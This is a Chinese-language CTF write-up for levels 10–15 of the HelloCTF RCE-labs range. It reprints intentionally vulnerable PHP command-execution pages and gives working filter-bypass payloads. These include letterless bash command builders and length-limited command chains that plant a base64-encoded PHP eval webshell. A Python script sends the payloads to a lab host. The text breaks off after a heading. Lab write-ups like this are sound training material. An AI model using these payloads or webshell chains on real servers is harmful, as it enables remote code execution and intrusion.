<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">/*</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line"># @Author: 探姬</span><br><span class="line"># @Date:   2024-08-11 14:34</span><br><span class="line"># @Repo:   github.com/ProbiusOfficial/RCE-labs</span><br><span class="line"># @email:  admin@hello-ctf.com</span><br><span class="line"># @link:   hello-ctf.com</span><br><span class="line"></span><br><span class="line">--- HelloCTF - RCE靶场 : 命令执行 - bash终端的无字母命令执行_二进制整数替换 --- </span><br><span class="line"></span><br><span class="line">题目已经拥有成熟脚本：https://github.com/ProbiusOfficial/bashFuck</span><br><span class="line">你也可以使用在线生成：https://probiusofficial.github.io/bashFuck/</span><br><span class="line">题目本身也提供一个/exp.php方便你使用</span><br><span class="line"></span><br><span class="line">本关卡的考点为终端中支持 $((2#binary)) 解析二进制数据。</span><br><span class="line"></span><br><span class="line">*/</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">function hello_shell($cmd)&#123;</span><br><span class="line">    if(preg_match(&quot;/[A-Za-z2-9\&quot;%*+,-.\/:;=&gt;?@[\]^`|]/&quot;, $cmd))&#123;</span><br><span class="line">        die(&quot;WAF!&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    system($cmd);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">isset($_GET[&#x27;cmd&#x27;]) ? hello_shell($_GET[&#x27;cmd&#x27;]) : null;</span><br><span class="line"></span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>0,1没有被过滤，想到用二进制</p>
<p>使用 $((2#binary))格式，但是2被过滤了，1&lt;&lt;1得到2</p>
<p>套一层$((   ))—&gt; $(($((1&lt;&lt;1))#binary))</p>
<p>题目已经拥有成熟脚本：<a target="_blank" rel="noopener" href="https://github.com/ProbiusOfficial/bashFuck">https://github.com/ProbiusOfficial/bashFuck</a><br>你也可以使用在线生成：<a target="_blank" rel="noopener" href="https://probiusofficial.github.io/bashFuck/">https://probiusofficial.github.io/bashFuck/</a></p>
<p>需要使用 <code>$0</code> 来充当 <code>bash</code>, 从而调用 <code>bash</code> 命令, 得以绕过WAF</p>
<p>详看<a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/EmCiVCbj_YESBimjxhtkIg">RCE-Labs超详细WP-Level10(无字母命令执行_二进制整数替换)</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$0&lt;&lt;&lt;$0\&lt;\&lt;\&lt;\$\&#x27;\\$(($((1&lt;&lt;1))#10001111))\\$(($((1&lt;&lt;1))#10001101))\\$(($((1&lt;&lt;1))#10100100))\\$(($((1&lt;&lt;1))#101000))\\$(($((1&lt;&lt;1))#10010010))\\$(($((1&lt;&lt;1))#10011010))\\$(($((1&lt;&lt;1))#10001101))\\$(($((1&lt;&lt;1))#10010011))\&#x27;</span><br><span class="line"></span><br><span class="line">url编码（对#进行编码）</span><br><span class="line">$0&lt;&lt;&lt;$0\&lt;\&lt;\&lt;\$\&#x27;\\$(($((1&lt;&lt;1))%2310001111))\\$(($((1&lt;&lt;1))%2310001101))\\$(($((1&lt;&lt;1))%2310100100))\\$(($((1&lt;&lt;1))%23101000))\\$(($((1&lt;&lt;1))%23111001))\\$(($((1&lt;&lt;1))%2310010010))\\$(($((1&lt;&lt;1))%2310011010))\\$(($((1&lt;&lt;1))%2310001101))\\$(($((1&lt;&lt;1))%2310010011))\&#x27;</span><br><span class="line"></span><br></pre></td></tr></table></figure>





<h2 id="level11"><a href="#level11" class="headerlink" title="level11"></a>level11</h2><h3 id="bash终端的无字母命令执行-数字1的特殊变量替换"><a href="#bash终端的无字母命令执行-数字1的特殊变量替换" class="headerlink" title="bash终端的无字母命令执行_数字1的特殊变量替换"></a>bash终端的无字母命令执行_数字1的特殊变量替换</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">/*</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line"># @Author: 探姬</span><br><span class="line"># @Date:   2024-08-11 14:34</span><br><span class="line"># @Repo:   github.com/ProbiusOfficial/RCE-labs</span><br><span class="line"># @email:  admin@hello-ctf.com</span><br><span class="line"># @link:   hello-ctf.com</span><br><span class="line"></span><br><span class="line">--- HelloCTF - RCE靶场 : 命令执行 - bash终端的无字母命令执行_数字1的特殊变量替换 --- </span><br><span class="line"></span><br><span class="line">题目已经拥有成熟脚本：https://github.com/ProbiusOfficial/bashFuck</span><br><span class="line">你也可以使用在线生成：https://probiusofficial.github.io/bashFuck/</span><br><span class="line">题目本身也提供一个/exp.php方便你使用</span><br><span class="line"></span><br><span class="line">本关卡的考点为终端中支持 $((2#binary)) 解析二进制数据 + 我们用 $&#123;##&#125; 来替换 1 </span><br><span class="line"></span><br><span class="line">*/</span><br><span class="line"></span><br><span class="line">function hello_shell($cmd)&#123;</span><br><span class="line">    if(preg_match(&quot;/[A-Za-z1-9\&quot;%*+,-.\/:;=&gt;?@[\]^`|]/&quot;, $cmd))&#123;</span><br><span class="line">        die(&quot;WAF!&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    system($cmd);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">isset($_POST[&#x27;cmd&#x27;]) ? hello_shell($_POST[&#x27;cmd&#x27;]) : null;</span><br><span class="line"></span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>$ 可以替换 1 </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">用在线工具得到这个</span><br><span class="line">cmd=$0&lt;&lt;&lt;$0\&lt;\&lt;\&lt;\$\&#x27;\\$(($(($&#123;##&#125;&lt;&lt;$&#123;##&#125;))#$&#123;##&#125;00$&#123;##&#125;$&#123;##&#125;0$&#123;##&#125;0))\\$(($(($&#123;##&#125;&lt;&lt;$&#123;##&#125;))#$&#123;##&#125;0$&#123;##&#125;000$&#123;##&#125;$&#123;##&#125;))\\$(($(($&#123;##&#125;&lt;&lt;$&#123;##&#125;))#$&#123;##&#125;0$&#123;##&#125;000))\\$(($(($&#123;##&#125;&lt;&lt;$&#123;##&#125;))#$&#123;##&#125;$&#123;##&#125;$&#123;##&#125;00$&#123;##&#125;))\&#x27;</span><br><span class="line"></span><br><span class="line">///exp.php index.php</span><br><span class="line">cmd=$0&lt;&lt;&lt;$0\&lt;\&lt;\&lt;\$\&#x27;\\$(($(($&#123;##&#125;&lt;&lt;$&#123;##&#125;))#$&#123;##&#125;000$&#123;##&#125;$&#123;##&#125;$&#123;##&#125;$&#123;##&#125;))\\$(($(($&#123;##&#125;&lt;&lt;$&#123;##&#125;))#$&#123;##&#125;000$&#123;##&#125;$&#123;##&#125;0$&#123;##&#125;))\\$(($(($&#123;##&#125;&lt;&lt;$&#123;##&#125;))#$&#123;##&#125;0$&#123;##&#125;00$&#123;##&#125;00))\\$(($(($&#123;##&#125;&lt;&lt;$&#123;##&#125;))#$&#123;##&#125;0$&#123;##&#125;000))\\$(($(($&#123;##&#125;&lt;&lt;$&#123;##&#125;))#$&#123;##&#125;$&#123;##&#125;$&#123;##&#125;00$&#123;##&#125;))\\$(($(($&#123;##&#125;&lt;&lt;$&#123;##&#125;))#$&#123;##&#125;00$&#123;##&#125;00$&#123;##&#125;0))\\$(($(($&#123;##&#125;&lt;&lt;$&#123;##&#125;))#$&#123;##&#125;00$&#123;##&#125;$&#123;##&#125;0$&#123;##&#125;0))\\$(($(($&#123;##&#125;&lt;&lt;$&#123;##&#125;))#$&#123;##&#125;000$&#123;##&#125;$&#123;##&#125;0$&#123;##&#125;))\\$(($(($&#123;##&#125;&lt;&lt;$&#123;##&#125;))#$&#123;##&#125;00$&#123;##&#125;00$&#123;##&#125;$&#123;##&#125;))\&#x27;</span><br><span class="line"></span><br></pre></td></tr></table></figure>





<p>12环境打不开</p>
<h2 id="level13"><a href="#level13" class="headerlink" title="level13"></a>level13</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">/*</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line"># @Author: 探姬</span><br><span class="line"># @Date:   2024-08-11 14:34</span><br><span class="line"># @Repo:   github.com/ProbiusOfficial/RCE-labs</span><br><span class="line"># @email:  admin@hello-ctf.com</span><br><span class="line"># @link:   hello-ctf.com</span><br><span class="line"></span><br><span class="line">--- HelloCTF - RCE靶场 : 命令执行 - bash终端的无字母命令执行_特殊扩展替换任意数字 --- </span><br><span class="line"></span><br><span class="line">题目已经拥有成熟脚本：https://github.com/ProbiusOfficial/bashFuck</span><br><span class="line">你也可以使用在线生成：https://probiusofficial.github.io/bashFuck/</span><br><span class="line">题目本身也提供一个/exp.php方便你使用</span><br><span class="line"></span><br><span class="line">本关卡的考点为 $(()) + 取反 构造任意数字</span><br><span class="line"></span><br><span class="line">echo $(()) -&gt; 0</span><br><span class="line">echo $((~$(()))) -&gt; -1</span><br><span class="line">echo $(($((~$(())))$((~$(()))))) -&gt; -2</span><br><span class="line"></span><br><span class="line">*/</span><br><span class="line"></span><br><span class="line">function hello_shell($cmd)&#123;</span><br><span class="line">    if(preg_match(&quot;/[A-Za-z0-9\&quot;%*+,-.\/:;&gt;?@[\]^`|]/&quot;, $cmd))&#123;</span><br><span class="line">        die(&quot;WAF!&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    system($cmd);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">isset($_GET[&#x27;cmd&#x27;]) ? hello_shell($_GET[&#x27;cmd&#x27;]) : null;</span><br><span class="line"></span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">在线工具</span><br><span class="line">还需要url编码</span><br><span class="line">__%3d%24(())%26%26%24%7b!__%7d%3c%3c%3c%24%7b!__%7d%5c%3c%5c%3c%5c%3c%5c%24%5c%27%5c%5c%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))))))%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%5c%5c%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))))))%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%5c%5c%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%24(())%5c%5c%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%5c%27</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">__%3d%24(())%26%26%24%7b!__%7d%3c%3c%3c%24%7b!__%7d%5c%3c%5c%3c%5c%3c%5c%24%5c%27%5c%5c%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))))))%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%5c%5c%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))))))%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))))))%5c%5c%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))))))%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%5c%5c%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%24(())%5c%5c%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%5c%5c%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))))))%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%5c%5c%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))))))%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%5c%5c%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))))))%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))))))%5c%5c%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))))))%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%24((%7e%24((%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))%24((%7e%24(())))))))%5c%27</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="level14"><a href="#level14" class="headerlink" title="level14"></a>level14</h2><h3 id="7字符RCE"><a href="#7字符RCE" class="headerlink" title="7字符RCE"></a>7字符RCE</h3><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/nzjdsds/article/details/102873187">7位可控字符下的任意命令执行-CSDN博客</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">if(isset($_GET[1]) &amp;&amp; strlen($_GET[1]) &lt; 8)&#123;</span><br><span class="line">    echo strlen($_GET[1]);</span><br><span class="line">    echo &#x27;&lt;hr/&gt;&#x27;;</span><br><span class="line">    echo shell_exec($_GET[1]);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    exit(&#x27;too long&#x27;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>1，需要用到的基础知识</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&gt;a    #虽然没有输入但是会创建a这个文件</span><br><span class="line">ls -t    #ls基于基于事件排序（从晚到早）</span><br><span class="line">sh a    #sh会把a里面的每行内容当作命令来执行</span><br><span class="line">使用|进行命令拼接    #l\ s    =    ls</span><br><span class="line">base64    #使用base64编码避免特殊字符</span><br><span class="line">执行命令时，可以在没有写完的命令后面加\，实现将一条命令多行化，以行末没有\为终止</span><br></pre></td></tr></table></figure>

<p>需要写入的语句</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php eval($_GET[1]);</span><br><span class="line">base64编码后</span><br><span class="line">PD9waHAgZXZhbCgkX0dFVFsxXSk7</span><br><span class="line"></span><br><span class="line">执行语句</span><br><span class="line">echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d&gt;1.php</span><br></pre></td></tr></table></figure>

<p>payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&gt;hp</span><br><span class="line">&gt;1.p\\</span><br><span class="line">&gt;d\&gt;\\</span><br><span class="line">&gt;\ -\\</span><br><span class="line">&gt;e64\\</span><br><span class="line">&gt;bas\\</span><br><span class="line">&gt;7\|\\</span><br><span class="line">&gt;XSk\\</span><br><span class="line">&gt;Fsx\\</span><br><span class="line">&gt;dFV\\</span><br><span class="line">&gt;kX0\\</span><br><span class="line">&gt;bCg\\</span><br><span class="line">&gt;XZh\\</span><br><span class="line">&gt;AgZ\\</span><br><span class="line">&gt;waH\\</span><br><span class="line">&gt;PD9\\</span><br><span class="line">&gt;o\ \\</span><br><span class="line">&gt;ech\\</span><br><span class="line">ls -t&gt;0</span><br><span class="line">sh 0</span><br></pre></td></tr></table></figure>

<p>把内容输进去后</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1.php?1=system(&#x27;ls /&#x27;);</span><br><span class="line">1.php?1=system(&#x27;cat /flag&#x27;);</span><br></pre></td></tr></table></figure>

<p>有脚本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/python</span><br><span class="line"># -*- coding: UTF-8 -*-</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">import requests</span><br><span class="line"> </span><br><span class="line">url = &quot;http://192.168.61.157/rce.php?1=&#123;0&#125;&quot;</span><br><span class="line">print(&quot;[+]start attack!!!&quot;)</span><br><span class="line">with open(&quot;payload.txt&quot;,&quot;r&quot;) as f:</span><br><span class="line">	for i in f:</span><br><span class="line">		print(&quot;[*]&quot; + url.format(i.strip()))</span><br><span class="line">		requests.get(url.format(i.strip()))</span><br><span class="line"> </span><br><span class="line">#检查是否攻击成功</span><br><span class="line">test = requests.get(&quot;http://192.168.61.157/1.php&quot;)</span><br><span class="line">if test.status_code == requests.codes.ok:</span><br><span class="line">	print(&quot;[*]Attack success!!!&quot;)</span><br></pre></td></tr></table></figure>

<p>2，但是这个题阔以直接用通配符</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?1=ls /</span><br><span class="line">?1=cat /f*</span><br></pre></td></tr></table></figure>



<h2 id="level15"><a href="#level15" class="headerlink" title="level15"></a>level15</h2><h3 id="5字符rce"><a href="#5字符rce" class="headerlink" title="5字符rce"></a>5字符rce</h3><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/q20010619/article/details/109206728">https://blog.csdn.net/q20010619/article/details/109206728</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">$sandbox = &#x27;/www/sandbox/&#x27; . md5(&quot;orange&quot; . $_SERVER[&#x27;REMOTE_ADDR&#x27;]);</span><br><span class="line">@mkdir($sandbox);</span><br><span class="line">@chdir($sandbox);</span><br><span class="line">if (isset($_GET[&#x27;cmd&#x27;]) &amp;&amp; strlen($_GET[&#x27;cmd&#x27;]) &lt;= 5) &#123;</span><br><span class="line">    @exec($_GET[&#x27;cmd&#x27;]);</span><br><span class="line">&#125; else if (isset($_GET[&#x27;reset&#x27;])) &#123;</span><br><span class="line">    @exec(&#x27;/bin/rm -rf &#x27; . $sandbox);</span><br><span class="line">&#125;</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>1，</p>
<p>payload:</p>
<?php eval($_GET[1]);

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">&gt;dir          &gt; 列出目录</span><br><span class="line">&gt;f\&gt;          &gt; 创建文件&quot;f&gt;&quot;</span><br><span class="line">&gt;ht-          &gt; 创建文件&quot;ht-&quot;</span><br><span class="line">&gt;sl           &gt; 创建文件&quot;sl&quot;</span><br><span class="line">*&gt;v           &gt; 将所有文件(*)内容输出到文件&quot;v&quot;</span><br><span class="line">&gt;rev          &gt; 创建文件&quot;rev&quot;（暗示反向Shell）</span><br><span class="line">*v&gt;0          &gt; 将所有以v结尾的文件内容输出到文件&quot;0&quot;</span><br><span class="line">&gt;a            &gt; 创建文件&quot;a&quot;</span><br><span class="line">&gt;hp           &gt; 创建文件&quot;hp&quot;</span><br><span class="line">&gt;p\\          &gt; 创建文件&quot;p\&quot;</span><br><span class="line">&gt;1.\\         &gt; 创建文件&quot;1.\&quot;</span><br><span class="line">&gt;\&gt;\\         &gt; 创建文件&quot;&gt;\&quot;</span><br><span class="line">&gt;-d\\         &gt; 创建文件&quot;-d\&quot;</span><br><span class="line">&gt;\ \\         &gt; 创建文件&quot; \&quot;</span><br><span class="line">&gt;64\\         &gt; 创建文件&quot;64\&quot;</span><br><span class="line">&gt;se\\         &gt; 创建文件&quot;se\&quot;</span><br><span class="line">&gt;ba\\         &gt; 创建文件&quot;ba\&quot;</span><br><span class="line">&gt;\|\\         &gt; 创建文件&quot;|\&quot;</span><br><span class="line">&gt;7\\          &gt; 创建文件&quot;7\&quot;</span><br><span class="line">&gt;Sk\\         &gt; 创建文件&quot;Sk\&quot;</span><br><span class="line">&gt;X\\          &gt; 创建文件&quot;X\&quot;</span><br><span class="line">&gt;x\\          &gt; 创建文件&quot;x\&quot;</span><br><span class="line">&gt;Fs\\         &gt; 创建文件&quot;Fs\&quot;</span><br><span class="line">&gt;FV\\         &gt; 创建文件&quot;FV\&quot;</span><br><span class="line">&gt;d\\          &gt; 创建文件&quot;d\&quot;</span><br><span class="line">&gt;X0\\         &gt; 创建文件&quot;X0\&quot;</span><br><span class="line">&gt;k\\          &gt; 创建文件&quot;k\&quot;</span><br><span class="line">&gt;g\\          &gt; 创建文件&quot;g\&quot;</span><br><span class="line">&gt;bC\\         &gt; 创建文件&quot;bC\&quot;</span><br><span class="line">&gt;h\\          &gt; 创建文件&quot;h\&quot;</span><br><span class="line">&gt;XZ\\         &gt; 创建文件&quot;XZ\&quot;</span><br><span class="line">&gt;gZ\\         &gt; 创建文件&quot;gZ\&quot;</span><br><span class="line">&gt;A\\          &gt; 创建文件&quot;A\&quot;</span><br><span class="line">&gt;aH\\         &gt; 创建文件&quot;aH\&quot;</span><br><span class="line">&gt;w\\          &gt; 创建文件&quot;w\&quot;</span><br><span class="line">&gt;D9\\         &gt; 创建文件&quot;D9\&quot;</span><br><span class="line">&gt;P\\          &gt; 创建文件&quot;P\&quot;</span><br><span class="line">&gt;S&#125;\\         &gt; 创建文件&quot;S&#125;&quot;</span><br><span class="line">&gt;IF\\         &gt; 创建文件&quot;IF\&quot;</span><br><span class="line">&gt;&#123;\\          &gt; 创建文件&quot;&#123;\&quot;</span><br><span class="line">&gt;\$\\         &gt; 创建文件&quot;$\&quot;</span><br><span class="line">&gt;o\\          &gt; 创建文件&quot;o\&quot;</span><br><span class="line">&gt;ch\\         &gt; 创建文件&quot;ch\&quot;</span><br><span class="line">&gt;e\\          &gt; 创建文件&quot;e\&quot;</span><br><span class="line">sh 0          &gt; 执行文件&quot;0&quot;作为shell脚本</span><br><span class="line">sh f           &gt; 执行文件&quot;f&quot;作为shell脚本</span><br></pre></td></tr></table>

ls -t>f的构造方法

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&gt;dir</span><br><span class="line">&gt;f\&gt;</span><br><span class="line">&gt;ht-</span><br><span class="line">&gt;sl</span><br><span class="line">*&gt;v  (等同于命令：dir &quot;f&gt;&quot; &quot;ht‐&quot; &quot;sl&quot; &gt; v )</span><br><span class="line">&gt;rev </span><br><span class="line">*v&gt;0 前面的*v等同于命令rev v，相当于将v中的文件内容倒了回来，变回:ls -th &gt;f</span><br><span class="line">然后将倒转后的内容写入文件0中，文件0中的内容为:ls -th &gt;f</span><br></pre></td></tr></table></figure>



脚本

